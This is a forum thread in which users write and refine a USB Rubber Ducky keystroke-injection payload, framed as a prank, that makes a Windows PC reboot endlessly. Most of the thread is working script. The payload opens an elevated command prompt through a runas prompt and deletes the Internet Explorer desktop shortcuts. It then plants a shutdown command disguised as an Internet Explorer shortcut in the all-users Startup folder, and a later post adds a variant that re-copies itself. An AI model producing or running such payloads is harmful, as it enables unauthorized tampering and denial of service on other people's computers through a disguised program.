Jump to content

New Ducky Script Concept


Forgiven
 Share

Recommended Posts

There's a pretty funny prank that many of you may already know about, that would be cool to turn into a USB Rubber Ducky prank attack. The concept is based upon creating an infinite boot loop in the target windows system. The physical access method for creating the attack without a ducky is described on this YouTube video. Essentially the command sequence: shutdown -r -t 10 -c "Your Message Here"

Is created as a shortcut and saved into the startup folder so that when the victim turns off and then restarts their machine, it goes through an annoying reboot loop. It was hidden in the video as a shortcut named Internet Explorer and having the icon to match....clever.

The prank is harmless since simply holding down the SHIFT key can cease implementation of startup folder actions to allow the victim to clear the shortcut script from their STARTUP folder.

Being able to use the power of the Mighty Rubber Ducky to quickly automate the prank on a target would be cool. Having the Duck do the prank via Powershell would be nice. That's the concept...I'm off to make a stab at my first ducky payload. If you beat me to it, please share your results.

Edited by Forgiven
Link to comment
Share on other sites

Here is what I knocked out in about 5 min. Delete post if you must.

REM *** Remove all internet explorer icons from the desktop. ***


REM *** Navigate to the desktop. ***
GUI D

REM *** Select the menu button for a context menu. ***
MENU

REM *** Select the 'New' menu option. 
STRING w

REM *** Select the shortcut option. ***
STRING s

REM *** Now the magic shutdown string. ***
STRING shutdown -r -t 10 -c "You have been owned!"

REM *** Select next button. ***
ALT N

REM *** Type in the shortcut name. ***
STRING Internet Explorer

REM *** Finish creating the shortcut. ***
ALT F

REM *** Select the shutdown executable from the desktop by typing it's name. ***
GUI D
STRING Internet Explorer

REM *** Pull up a context menu on the rogue shortcut. ***
MENU

REM *** Select 'properties' from the context menu. ***
STRING r

REM *** Select change icons button. ***
ALT C

REM *** Say ok to the popup box. ***
ENTER

REM *** You have to manually set the icon from here. ***


If you need something that will set the icon without user interaction, you could hijack the internet explorer icon that is already put on the desktop.

Edited by overwraith
Link to comment
Share on other sites

Got another script, but is not working correctly. Need to add some delays.

REM Author: overwraith based on 'Angry ginger kid hack'
REM Name: InfiniteBoot.txt
REM Purpose: A prank that makes a computer infinitely restart. 
REM Encoder V2.4+

REM *** Initial Delay *** 
DELAY 2000

REM *** Remove all internet explorer icons from the desktop. ***

REM *** Bypass UAC ***
REM Using the run command for a broader OS base. 
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Navigate to the desktop. ***
STRING cd cd %homepath%\Desktop
ENTER

REM *** Remove the icons. ***
STRING erase /Q "Internet Explorer*.lnk"
ENTER

REM *** Exit the command prompt. ***
STRING EXIT
ENTER

REM *** Navigate to the desktop. ***
GUI D

REM *** Select the menu button for a context menu. ***
MENU

REM *** Select the 'New' menu option. 
STRING w

REM *** Select the shortcut option. ***
STRING s

REM *** Now the magic shutdown string. ***
STRING shutdown -r -t 10 -c "You have been owned!"

REM *** Select next button. ***
ALT N

REM *** Type in the shortcut name. ***
STRING Internet Explorer

REM *** Finish creating the shortcut. ***
ALT F

REM *** Copy the shortcut file to the startup folder. ***

REM *** Bypass UAC ***
REM Using the run command for a broader OS base. 
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Navigate to the desktop. ***
STRING cd cd %homepath%\Desktop
ENTER

REM *** Copy the link on the desktop to the startup folder. ***
STRING copy /Y /L Internet Explorer*.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
ENTER

REM *** Exit the command prompt. ***
STRING EXIT
ENTER

REM *** Saving the manual link icon selection until the end of the script. 

REM *** Select the shutdown executable from the desktop by typing it's name. ***
GUI D
STRING Internet Explorer

REM *** Pull up a context menu on the rogue shortcut. ***
MENU

REM *** Select 'properties' from the context menu. ***
STRING r

REM *** Select change icons button. ***
ALT C

REM *** Say ok to the popup box. ***
ENTER

REM *** You have to manually set the icon from here. ***


Link to comment
Share on other sites

Ok, this script appears to work. May have to tweak the delays depending on the processing power of your system. If you do find yourself in a situation where you need to tweak the delays, break it up into procedures, and execute them one at a time. The first command window is procedure 1, making the shortcut is procedure 2, the second command window is procedure 3, and selecting the icon is procedure 4.

REM Author: overwraith based on 'Angry ginger kid hack'
REM Name: InfiniteBoot.txt
REM Purpose: A prank that makes a computer infinitely restart. 
REM Encoder V2.4+

DEFAULT_DELAY 50

REM *** Initial Delay *** 
DELAY 2000
GUI D

REM *** Remove all internet explorer icons from the desktop. ***

REM *** Bypass UAC ***
REM Using the run command for a broader OS base. 
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Navigate to the desktop. ***
STRING cd %homepath%\Desktop
ENTER

REM *** Remove the icons. ***
STRING erase /Q "Internet Explorer*.lnk"
ENTER

DELAY 500

REM *** Exit the command prompt. ***
STRING EXIT
ENTER

DELAY 750

REM *** Navigate to the desktop. ***
GUI D

DELAY 750

REM *** Select the menu button for a context menu. ***
MENU

REM *** Select the 'New' menu option. 
STRING w

REM *** Select the shortcut option. ***
STRING s

DELAY 2000

REM *** Now the magic shutdown string. ***
STRING shutdown -r -t 10 -c "You have been owned!"

REM *** Select next button. ***
ALT N

DELAY 1000

REM *** Type in the shortcut name. ***
STRING Internet Explorer

DELAY 750

REM *** Finish creating the shortcut. ***
ALT F

DELAY 1000

REM *** Copy the shortcut file to the startup folder. ***

REM *** Bypass UAC ***
REM Using the run command for a broader OS base. 
GUI r
DELAY 250
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY 1500
ALT y
DELAY 500
ENTER

REM *** Navigate to the desktop. ***
STRING cd %homepath%\Desktop
ENTER

DELAY 250

REM *** Copy the link on the desktop to the startup folder. ***
STRING xcopy /Y "Internet Explorer*.lnk" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\"
ENTER

DELAY 750

REM *** Exit the command prompt. ***
STRING EXIT
ENTER

DELAY 1000

REM *** Saving the manual link icon selection until the end of the script. 

REM *** Select the shutdown executable from the desktop by typing it's name. ***
GUI D
STRING Internet Explorer

DELAY 250

REM *** Pull up a context menu on the rogue shortcut. ***
MENU

DELAY 250

REM *** Select 'properties' from the context menu. ***
STRING R

DELAY 250

REM *** Select change icons button. ***
ALT C

REM *** Say ok to the popup box. ***
ENTER

REM *** You have to manually set the icon from here. ***


If you do shoot yourself in the foot with this script, boot into safe mode, and delete the file in the startup folder.

Edited by overwraith
Link to comment
Share on other sites

And since the shutdown command is just batch the following should be able to perpetuate the problem even after the shortcut is deleted from the start up folder.

xcopy /Y "Internet Explorer*.lnk" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\" & shutdown -r -t 10 -c "You have been owned!"

have not tried it yet, but I have no reason to think it shouldn't work. So every time the user clicks on the shortcut it should copy to the startup folder.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...